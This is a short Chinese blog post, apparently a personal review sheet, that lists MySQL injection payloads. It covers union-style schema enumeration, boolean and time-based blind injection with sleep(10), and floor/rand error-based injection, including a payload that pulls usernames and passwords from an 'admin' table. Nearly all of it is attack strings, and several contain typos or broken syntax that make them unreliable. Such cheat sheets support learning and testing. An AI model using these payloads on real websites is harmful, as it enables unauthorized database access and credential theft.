zoukankan      html  css  js  c++  java

  • 注入复习总结

    /*不定期更新*/

    Mysql Code:

    #常规注入:
select schema_name from information_schema.schemata;
select group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374;
select group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374;
#盲注:
select and ascii(mid(databases(),1,1))=115;
select and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1));
select and ascii(substring((select columns_name from information_schema.columns where column_schena=database() limit 1,1),1,1));
#延时盲注:
select and if(ascii(substring(database(),1,)),sleep(10),1);
select and if(ascii(substring((select table_name from information_schema.tables where table_schema=0x73716C696E6A656374),sleep(10),1));
select and if(ascii(substring((select columns_name from information_schema.columns where column_schema=0x73716C696E6A656374)),1,1),sleep(10),1);
#floor报错注入
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    信息收集函数:

    user()                             #当前使用者的用户名
database()                         #当前数据库名
version()                          #数据库版本
datadir                            #读取数据库的绝对路径
@@vasedir                          #Mysql安装路径
@@version_compile_os               #操作系统
concat()                           #连接一个或者多个字符串
group_concat()                     #连接一个组的所有字符串,并以逗号分隔每一条数据

    报错常用的函数:

    count  #计算元组的个数
rand    #取随机数
floor    #想下取正,比如1.9就取1

     结束
  • 相关阅读:
    TopCoder SRM502 Div1 500 贪心 01背包
    TopCoder SRM502 Div1 1000 动态规划
    LOJ#6433. 「PKUSC2018」最大前缀和 状压dp
    Codeforces 830D Singer House 动态规划
    Codeforces 830C Bamboo Partition 其他
    UOJ#275. 【清华集训2016】组合数问题 数位dp
    Codeforces 806 D. Perishable Roads Dijkstra
    UOJ#53. 【UR #4】追击圣诞老人 树链剖分 k短路
    Java第二天——标识符命名规则、Java的知识、快捷键的使用、Scanner获取值的常用方法
    Scanner的例子
  • 原文地址:https://www.cnblogs.com/xishaonian/p/6200818.html
Copyright © 2011-2022 走看看